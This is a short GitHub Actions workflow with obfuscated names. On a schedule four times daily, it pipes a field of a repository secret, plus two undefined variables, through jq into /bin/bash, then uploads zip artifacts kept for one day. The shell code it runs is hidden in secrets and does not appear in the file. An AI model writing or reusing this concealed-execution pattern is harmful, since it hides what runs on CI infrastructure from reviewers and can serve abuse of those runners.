name: xiancongyongkai
on:
  workflow_dispatch:

  schedule:
    - cron: '1 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiancongyongkai
        env:
          houai5246: ${{ secrets.houai5246 }}
        run: |
          printf '%s' "$houai5246" | jq -r .cnr3412 | /bin/bash
          echo $kro8856 | jq -r .wpfv5 | /bin/bash
          printf '%s' "$b2444" | jq -r .k9012 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: g3SzJ7Jz
          path: "*.zip"
          retention-days: 1
